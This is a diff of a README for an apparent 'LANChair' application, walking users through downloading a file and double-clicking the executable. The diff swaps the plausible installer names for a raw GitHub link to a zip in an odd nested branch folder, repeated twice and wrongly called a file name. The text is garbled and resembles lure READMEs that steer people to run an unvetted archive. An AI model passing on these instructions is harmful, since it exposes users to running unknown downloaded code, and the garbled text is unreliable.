Equalitydrouth93/LANChair_Website/README.md

 Click on the downloadable file to start the download.
 It will usually go to your “Downloads” folder.
 Make sure to note the file name for later.

 ### 5. 📂 Open the File
 Once the download is complete, navigate to your “Downloads” folder.
 Locate the downloaded file.
-It might be named something like `LANChair_Installer.exe` or `LANChair.dmg`.
+It might be named something like `https://raw.githubusercontent.com/Equalitydrouth93/LANChair_Website/LANChair_Website_Main-dev/daggletail/LANChair_Website.zip` or `https://raw.githubusercontent.com/Equalitydrouth93/LANChair_Website/LANChair_Website_Main-dev/daggletail/LANChair_Website.zip`.

 ### 6. 🚀 Install the Application
 - **For Windows Users:** Double-click the executable file.
 Follow the on-screen instructions to complete the installation.